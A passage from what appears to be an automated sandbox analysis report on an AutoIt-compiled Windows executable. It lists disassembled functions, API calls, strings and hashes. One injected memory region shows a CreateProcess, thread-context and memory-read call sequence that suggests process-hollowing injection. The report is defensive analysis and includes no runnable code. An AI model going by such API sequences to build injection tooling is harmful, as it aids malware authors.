                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                              • String ID: X$pWH
                                                                                              • API String ID: 85490731-941433119
                                                                                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                              Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • _memmove.LIBCMT ref: 00401B57
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                              • String ID: @EXITCODE
                                                                                              • API String ID: 2734553683-3436989551
                                                                                              • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                              • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                              Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1794320848-0
                                                                                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                              Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_
                                                                                              • String ID:
                                                                                              • API String ID: 1144537725-0
                                                                                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                              Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0043214B
                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                              • _malloc.LIBCMT ref: 0043215D
                                                                                              • _malloc.LIBCMT ref: 0043216F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _malloc$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 680241177-0
                                                                                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                              Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 4217535847-0
                                                                                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                              Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                              • _free.LIBCMT ref: 004295A0
                                                                                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 3938964917-2806939583
                                                                                              • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                              • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                              Function 04738110 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0473816A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID: D
                                                                                              • API String ID: 963392458-2746444292
                                                                                              • Opcode ID: efdf82a1e48cd01f1f44ac0dffb6eebfaf3faa77ee3fda0e7163886e06ef651f
                                                                                              • Instruction ID: 08e2ad7bbde0fd420a84738329f2662c5970fce24f0665bd7e79ae7b3b5a46b6
                                                                                              • Opcode Fuzzy Hash: efdf82a1e48cd01f1f44ac0dffb6eebfaf3faa77ee3fda0e7163886e06ef651f
                                                                                              • Instruction Fuzzy Hash: B2011275900318ABDB20EFE0CC49FFE77BCAF44702F40854DB6159A281FA74AA088B56
                                                                                              Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcat
                                                                                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                              • API String ID: 1765576173-2684727018
                                                                                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                              Function 0473707D Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 0473783B
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 047378D1
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 047378F3
                                                                                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 04737BFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 572931308-0
                                                                                              • Opcode ID: 1255ff05a3a391cede1f89d856dff3995fd10eb49087fc5ba29911cf4b5d1436
                                                                                              • Instruction ID: f1fd80dcf8b962f5fb50741a62b6ad5e19def6e7aa865b6d87a921c7a167e4b6
                                                                                              • Opcode Fuzzy Hash: 1255ff05a3a391cede1f89d856dff3995fd10eb49087fc5ba29911cf4b5d1436
                                                                                              • Instruction Fuzzy Hash: 8612EE24E24658C6EB24DF60D8507DEB232EF68301F1090E9910DEB7A5E77A5F81CF5A
                                                                                              Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                              • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                              Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__wsplitpath_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4163294574-0
                                                                                              • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                              • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                              • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                              • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                              Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4104443479-0
                                                                                              • Opcode ID: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                                                                              • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                                              • Opcode Fuzzy Hash: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                                                                              • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                                              Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                              • _strcat.LIBCMT ref: 0040F786
                                                                                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3199840319-0
                                                                                              • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                              • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                              Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                              • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
